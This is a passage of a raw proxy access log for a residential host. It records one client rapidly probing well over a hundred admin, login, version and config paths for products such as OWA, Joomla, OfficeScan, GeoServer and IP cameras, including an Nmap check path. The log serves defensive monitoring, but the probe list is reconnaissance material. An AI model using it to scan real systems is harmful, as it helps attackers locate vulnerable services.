(Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:50 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/apps/zxtm/login.cgi" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:50 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/portal/" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:50 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 172.235.168.35] [Length 1033] [Gzip -] "-" "-" +[18/Jan/2026:03:02:50 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/index.aspx" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:50 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/language/en-GB/en-GB.xml" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:50 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/indice.jsa" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:50 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/language/en-GB/en-GB.xml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:50 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/administrator/manifests/files/joomla.xml" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:50 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/status" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:50 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/version" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:50 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/login.html" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/main.asp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/versa/login" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/portal/" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/CFIDE/componentutils/" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:51 +0000] 400 - GET http localhost "/" [Client 172.235.168.35] [Length 252] [Gzip -] "-" "-" +[18/Jan/2026:03:02:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/admin.pl" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/info.asp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-bin/param.cgi?get_device_conf" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/menu.jhtml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:51 +0000] 400 - POST http 91-82-83-208.pool.digikabel.hu "/sdk" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/index.cgi" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/lms/db" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/geoserver/" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/inicio.jhtml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/info.asp" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-bin/param.cgi?get_device_conf" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/lms/db" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:51 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/status" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/webui" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/index.aspx" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.jsp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/version" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/dniapi/userInfos" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/login/login.html" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-mod/header_logo.cgi?size=big" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/allversions" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/vip/i18n/api/v2/translation/products/vRNIUI/versions/1" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/human.aspx?arg12=infotech" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/index.jsp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/allversions" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/dana-na/nc/nc_gina_ver.txt" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/main.asp" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/r-seenet/index.php" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/versions" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/vip/i18n/api/v2/translation/products/vRNIUI/versions/1" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/menu.php" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:52 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/ise/img/rm-logo_small.png" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Jan/2026:03:02:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/menu.jhtml" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/tos/index.php?user/login" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/login.aspx" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/menu.cgi" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/c/login" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/c/login" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/WebApp/js/UI_String.js" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/owa/" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/r-seenet/index.php" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/inicio.jhtml" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/base.cfm" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:53 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.235.168.35] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:03:02:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/IPCamDesc.xml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/officescan/console/cgi/cgiChkMasterPwd.exe" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/officescan/console/html/localization.js" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/login.aspx" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/ext-js/app/common/zld_product_spec.js" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/owa/" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/localstart.asp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/login/login.html" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/phoenix/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Jan/2026:03:02:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/admin.jsp" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/magento_version" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/v1.0/environment" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/config" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/kylin/" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/nmaplowercheck1768705364" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/main.jsp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cslu/v1/core/conf" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:54 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/ext-js/app/common/zld_product_spec.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Jan/2026:03:02:55 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/index.jsp" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:55 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/IPCamDesc.xml" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/HNAP1" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.jsa" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:55 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/config" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:55 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/kylin/" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/CHANGELOG.txt" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:55 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/cslu/v1/core/conf" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin/reports/status" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/inicio.jsa" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/webportal.cgi" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:55 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/helpdesk/WebObjects/Helpdesk.woa" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:55 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/admin/reports/updates" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:55 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/javascript/validation/OEM.js" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.html" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:55 +0000] 400 - GET http localhost "/" [Client 172.235.168.35] [Length 252] [Gzip -] "-" "-" +[18/Jan/2026:03:02:55 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/CHANGELOG.txt" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/administrator/manifests/files/joomla.xml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:55 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.235.168.35] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:03:02:55 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.235.168.35] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:03:02:55 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 172.235.168.35] [Length 1033] [Gzip -] "-" "-" +[18/Jan/2026:03:02:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/workplace/home.action" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/home.html" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/pandora_console/" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/pom.xml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:56 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-mod/header_logo.cgi?size=big" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:56 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.cgi" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:56 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/officescan/console/cgi/cgiChkMasterPwd.exe" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:56 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/build.gradle" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:56 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/v3/meta" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:56 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/admin/reports/status" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:56 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/v1.0/environment" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:56 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/pom.xml" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:56 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/geoserver/web/" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:56 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.235.168.35] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:03:02:56 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.235.168.35] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:03:02:56 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/localstart.jsp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:56 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/workplace/home.action" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:02:56 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu 